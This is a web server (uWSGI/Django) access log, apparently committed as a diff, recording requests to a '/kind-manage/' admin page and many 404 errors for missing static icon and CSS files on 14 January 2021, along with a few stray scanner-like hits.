+[pid: 11057|app: 0|req: 1289/1624] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1290/1625] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1291/1626] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1292/1627] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1293/1628] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1294/1629] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 54 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1295/1630] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 09:24:05 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1296/1631] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 09:24:05 2021] GET /static/css/spinners.css => generated 3516 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1297/1632] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 09:24:05 2021] GET /static/css/animate.css => generated 3513 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1298/1633] 180.160.72.163 () {40 vars in 895 bytes} [Thu Jan 14 09:24:20 2021] GET /kind-manage/ => generated 7368 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1299/1634] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1300/1635] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1301/1636] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1302/1637] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1303/1638] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1304/1639] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1305/1640] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1306/1641] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 09:24:20 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1307/1642] 180.160.72.163 () {38 vars in 768 bytes} [Thu Jan 14 09:24:20 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1309/1643] 180.160.72.163 () {40 vars in 895 bytes} [Thu Jan 14 09:24:39 2021] GET /kind-manage/? => generated 7368 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1309/1644] 180.160.72.163 () {48 vars in 977 bytes} [Thu Jan 14 09:24:39 2021] POST /kind-manage/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1310/1645] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1311/1646] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1312/1647] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1313/1648] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 09:24:39 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1314/1649] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1315/1650] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 19 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1316/1651] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1317/1652] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1318/1653] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 09:24:39 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1319/1654] 180.160.72.163 () {40 vars in 895 bytes} [Thu Jan 14 09:24:42 2021] GET /kind-manage/ => generated 8307 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1320/1655] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1321/1656] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1322/1657] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1323/1658] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1324/1659] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1325/1660] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1326/1661] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1327/1662] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 09:24:42 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1328/1663] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 09:24:42 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /
+[pid: 11057|app: 0|req: 1329/1664] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 09:28:59 2021] GET / => generated 3429 bytes in 5 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /http:/112.124.42.80:63435/
+[pid: 11057|app: 0|req: 1330/1665] 60.191.125.35 () {34 vars in 625 bytes} [Thu Jan 14 09:51:12 2021] HEAD http://112.124.42.80:63435/ => generated 1698 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /
+[pid: 11057|app: 0|req: 1331/1666] 83.97.20.29 () {26 vars in 278 bytes} [Thu Jan 14 10:10:18 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1332/1667] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:45:50 2021] POST /kind-manage/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1333/1668] 180.160.49.168 () {40 vars in 894 bytes} [Thu Jan 14 10:45:50 2021] GET /kind-manage/ => generated 7362 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1669] 180.160.49.168 () {40 vars in 879 bytes} [Thu Jan 14 10:45:50 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1670] 180.160.49.168 () {40 vars in 813 bytes} [Thu Jan 14 10:45:50 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1671] 180.160.49.168 () {40 vars in 842 bytes} [Thu Jan 14 10:45:50 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1672] 180.160.49.168 () {40 vars in 854 bytes} [Thu Jan 14 10:45:50 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1673] 180.160.49.168 () {40 vars in 825 bytes} [Thu Jan 14 10:45:50 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1674] 180.160.49.168 () {40 vars in 818 bytes} [Thu Jan 14 10:45:50 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1334/1675] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:45:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1335/1676] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1336/1677] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1337/1678] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1338/1679] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1339/1680] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1340/1681] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:45:51 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1341/1682] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:45:51 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1342/1683] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1684] 180.160.49.168 () {40 vars in 794 bytes} [Thu Jan 14 10:45:51 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1685] 180.160.49.168 () {40 vars in 806 bytes} [Thu Jan 14 10:45:51 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1686] 180.160.49.168 () {40 vars in 882 bytes} [Thu Jan 14 10:45:51 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1687] 180.160.49.168 () {40 vars in 804 bytes} [Thu Jan 14 10:45:51 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1688] 180.160.49.168 () {40 vars in 878 bytes} [Thu Jan 14 10:45:51 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1689] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 10:45:51 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 1343/1690] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:45:52 2021] POST /kind-manage/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1344/1691] 180.160.49.168 () {40 vars in 894 bytes} [Thu Jan 14 10:45:52 2021] GET /kind-manage/ => generated 6423 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1345/1692] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1346/1693] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1347/1694] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1348/1695] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1349/1696] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1350/1697] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1351/1698] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1352/1699] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:45:52 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1353/1700] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:45:52 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1355/1701] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:46:22 2021] GET /kind-manage/? => generated 6423 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1355/1702] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:46:22 2021] POST /kind-manage/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1356/1703] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1357/1704] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1358/1705] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1359/1706] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1360/1707] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1361/1708] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1362/1709] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:46:22 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1363/1710] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:46:22 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1364/1711] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:46:22 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1365/1712] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:46:25 2021] GET /kind-manage/ => generated 7365 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1366/1713] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1367/1714] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1368/1715] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1369/1716] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1370/1717] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
